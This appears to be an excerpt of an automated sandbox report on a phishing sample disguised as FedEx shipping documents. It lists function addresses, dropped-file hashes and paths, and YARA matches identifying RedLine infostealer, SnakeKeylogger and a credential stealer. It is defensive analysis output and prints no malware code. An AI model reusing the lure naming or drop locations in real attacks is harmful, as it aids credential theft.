Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D693BB8	7_2_2D693BB8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69C1B8	7_2_2D69C1B8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69D9B0	7_2_2D69D9B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D699B88	7_2_2D699B88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69F18A	7_2_2D69F18A
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D694980	7_2_2D694980
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69F198	7_2_2D69F198
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D698390	7_2_2D698390
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D696069	7_2_2D696069
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D692068	7_2_2D692068
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D698868	7_2_2D698868
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69DE68	7_2_2D69DE68
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69F660	7_2_2D69F660
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D696078	7_2_2D696078
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69DE78	7_2_2D69DE78
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697070	7_2_2D697070
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D694042	7_2_2D694042
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69A042	7_2_2D69A042
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D698858	7_2_2D698858
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69F651	7_2_2D69F651
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D694050	7_2_2D694050
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69A050	7_2_2D69A050
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69B828	7_2_2D69B828
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69B838	7_2_2D69B838
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D694E08	7_2_2D694E08
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69E808	7_2_2D69E808
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D690E08	7_2_2D690E08
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697A02	7_2_2D697A02
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D690006	7_2_2D690006
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D694E18	7_2_2D694E18
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697A10	7_2_2D697A10
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69D016	7_2_2D69D016
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69D4E8	7_2_2D69D4E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6944E8	7_2_2D6944E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69BCF2	7_2_2D69BCF2
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6904C9	7_2_2D6904C9
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697EC8	7_2_2D697EC8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6924C0	7_2_2D6924C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6996C0	7_2_2D6996C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69ECC0	7_2_2D69ECC0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6904D8	7_2_2D6904D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697ED8	7_2_2D697ED8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6944D8	7_2_2D6944D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69D4D8	7_2_2D69D4D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69ECD0	7_2_2D69ECD0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69AEA8	7_2_2D69AEA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6912A0	7_2_2D6912A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6952A2	7_2_2D6952A2
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69AEA2	7_2_2D69AEA2
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6924B1	7_2_2D6924B1
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6952B0	7_2_2D6952B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6996B0	7_2_2D6996B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D693288	7_2_2D693288
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D697080	7_2_2D697080
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69C682	7_2_2D69C682
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D69C690	7_2_2D69C690
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C8E08	7_2_2D6C8E08
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C2688	7_2_2D6C2688
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CC968	7_2_2D6CC968
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C9768	7_2_2D6C9768
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1368	7_2_2D6C1368
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CFB70	7_2_2D6CFB70
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CDF48	7_2_2D6CDF48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CAD48	7_2_2D6CAD48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1359	7_2_2D6C1359
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CC328	7_2_2D6CC328
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C9128	7_2_2D6C9128
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CF528	7_2_2D6CF528
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CD908	7_2_2D6CD908
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C0508	7_2_2D6C0508
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CA708	7_2_2D6CA708
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CA3E8	7_2_2D6CA3E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CD5E8	7_2_2D6CD5E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CF1F8	7_2_2D6CF1F8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CB9C8	7_2_2D6CB9C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CEBC8	7_2_2D6CEBC8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C21C0	7_2_2D6C21C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C09C0	7_2_2D6C09C0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C09D0	7_2_2D6C09D0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CCFA8	7_2_2D6CCFA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C9DA8	7_2_2D6C9DA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C21B2	7_2_2D6C21B2
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CE588	7_2_2D6CE588
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CB388	7_2_2D6CB388
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CB068	7_2_2D6CB068
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CE268	7_2_2D6CE268
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CC648	7_2_2D6CC648
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C9448	7_2_2D6C9448
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C0040	7_2_2D6C0040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CF850	7_2_2D6CF850
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CAA28	7_2_2D6CAA28
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CDC28	7_2_2D6CDC28
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1820	7_2_2D6C1820
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1830	7_2_2D6C1830
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CF208	7_2_2D6CF208
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CC008	7_2_2D6CC008
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C0007	7_2_2D6C0007
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CBCE8	7_2_2D6CBCE8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CEEE8	7_2_2D6CEEE8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1CE9	7_2_2D6C1CE9
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C04F8	7_2_2D6C04F8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C1CF8	7_2_2D6C1CF8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C3CF9	7_2_2D6C3CF9
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CA0C8	7_2_2D6CA0C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CD2C8	7_2_2D6CD2C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CB6A8	7_2_2D6CB6A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CE8A8	7_2_2D6CE8A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C0E88	7_2_2D6C0E88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6CCC88	7_2_2D6CCC88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C9A88	7_2_2D6C9A88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D6C0E98	7_2_2D6C0E98
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D842ED0	7_2_2D842ED0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D844A70	7_2_2D844A70
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8427B0	7_2_2D8427B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8420C8	7_2_2D8420C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D844388	7_2_2D844388
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D843CA0	7_2_2D843CA0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8435B8	7_2_2D8435B8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D842EC3	7_2_2D842EC3
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D844A60	7_2_2D844A60
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8427A0	7_2_2D8427A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8420B9	7_2_2D8420B9
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D840040	7_2_2D840040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D84437B	7_2_2D84437B
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D841D38	7_2_2D841D38
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D841D48	7_2_2D841D48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D843C8F	7_2_2D843C8F
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8435A8	7_2_2D8435A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D849300	7_2_2D849300
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8412A8	7_2_2D8412A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8412B8	7_2_2D8412B8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D8492F0	7_2_2D8492F0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2DBAB830	7_2_2DBAB830
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2DBA0690	7_2_2DBA0690
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2DBAE8B0	7_2_2DBAE8B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2DBAE8A0	7_2_2DBAE8A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2DBA5270	7_2_2DBA5270
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2E2E44DF	7_2_2E2E44DF
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2E2E37D8	7_2_2E2E37D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2E2E0025	7_2_2E2E0025
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2E2E0040	7_2_2E2E0040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2F6E5320	7_2_2F6E5320
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2F6EE3A8	7_2_2F6EE3A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2F6EB369	7_2_2F6EB369
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2F6EB378	7_2_2F6EB378
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_030420B4	11_2_030420B4
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_0304CFC6	11_2_0304CFC6
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_0304CECD	11_2_0304CECD

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\Mxhvdwzh.PIF 0009A5BB1BB1542C3663BC48457B7391C940AD8284D92996FA8A058FC4B5A8CC
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\hzwdvhxM.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: String function: 03044444 appears 154 times
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: String function: 03053E98 appears 50 times
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: String function: 030445D0 appears 576 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D545D0 appears 832 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D5424C appears 64 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D63E98 appears 56 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D54444 appears 245 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D54270 appears 31 times
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: String function: 02D63F1C appears 45 times

Source: NETUTILS.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 12.2.hzwdvhxM.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.hzwdvhxM.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.1.hzwdvhxM.pif.4da6c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.1.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
